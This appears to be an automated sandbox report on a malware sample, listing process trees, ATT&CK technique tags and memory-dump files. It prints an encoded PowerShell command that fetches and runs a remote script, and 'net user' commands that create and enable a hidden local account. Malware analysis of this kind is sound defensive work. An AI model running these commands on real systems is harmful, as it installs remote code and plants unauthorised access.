cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1192
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    PID:3920

C:\Windows\System32\cmd.exe
cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
1⤵
PID:2792
- C:\Windows\system32\net.exe
  net user wgautilacc 111213
  2⤵
  PID:3840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 111213
    3⤵
    PID:3864
- C:\Windows\system32\net.exe
  net user wgautilacc /active:yes
  2⤵
  PID:2784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc /active:yes
    3⤵
    PID:3032

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/568-118-0x0000028672F65000-0x0000028672F66000-memory.dmp

Filesize
4KB

Download
memory/568-114-0x00000286733A0000-0x00000286737C0000-memory.dmp

Filesize
4.1MB

Download
memory/568-116-0x0000028672F60000-0x0000028672F62000-memory.dmp

Filesize
8KB

Download
memory/568-117-0x0000028672F63000-0x0000028672F65000-memory.dmp

Filesize
8KB

Download
memory/568-119-0x0000028672F66000-0x0000028672F67000-memory.dmp

Filesize
4KB

Download
memory/732-247-0x00000177758A8000-0x00000177758AA000-memory.dmp

Filesize
8KB

Download
memory/732-214-0x00000177758A3000-0x00000177758A5000-memory.dmp

Filesize
8KB

Download
memory/732-213-0x00000177758A0000-0x00000177758A2000-memory.dmp

Filesize
8KB

Download
memory/732-245-0x00000177758A6000-0x00000177758A8000-memory.dmp

Filesize
8KB

Download
memory/2484-193-0x0000028E198B6000-0x0000028E198B8000-memory.dmp

Filesize
8KB

Download
memory/2484-171-0x0000028E198B3000-0x0000028E198B5000-memory.dmp

Filesize
8KB

Download
memory/2484-170-0x0000028E198B0000-0x0000028E198B2000-memory.dmp

Filesize
8KB

Download
memory/2784-290-0x000001F172218000-0x000001F17221A000-memory.dmp

Filesize
8KB

Download
memory/2784-281-0x000001F172216000-0x000001F172218000-memory.dmp

Filesize
8KB

Download
memory/2784-280-0x000001F172213000-0x000001F172215000-memory.dmp

Filesize
8KB

Download
memory/2784-279-0x000001F172210000-0x000001F172212000-memory.dmp

Filesize
8KB

Download
memory/3144-129-0x000001F53EE90000-0x000001F53EE91000-memory.dmp

Filesize
4KB

Download
memory/3144-135-0x000001F525CD0000-0x000001F525CD2000-memory.dmp

Filesize
8KB

Download
memory/3144-152-0x000001F53F390000-0x000001F53F391000-memory.dmp

Filesize
4KB

Download
memory/3144-125-0x000001F53E340000-0x000001F53E341000-memory.dmp

Filesize
4KB

Download
memory/3144-153-0x000001F53F720000-0x000001F53F721000-memory.dmp

Filesize
4KB

Download
memory/3144-151-0x000001F525CD8000-0x000001F525CD9000-memory.dmp

Filesize
4KB

Download
memory/3144-145-0x000001F5261E0000-0x000001F5261E1000-memory.dmp

Filesize
4KB

Download
memory/3144-140-0x000001F525CD6000-0x000001F525CD8000-memory.dmp

Filesize
8KB

Download
memory/3144-136-0x000001F525CD3000-0x000001F525CD5000-memory.dmp

Filesize
8KB

Download
memory/3920-381-0x0000023264163000-0x0000023264165000-memory.dmp

Filesize
8KB

Download
memory/3920-393-0x0000023264168000-0x0000023264169000-memory.dmp

Filesize
4KB

Download
memory/3920-384-0x0000023264166000-0x0000023264168000-memory.dmp

Filesize
8KB

Download
memory/3920-380-0x0000023264160000-0x0000023264162000-memory.dmp

Filesize
8KB

Download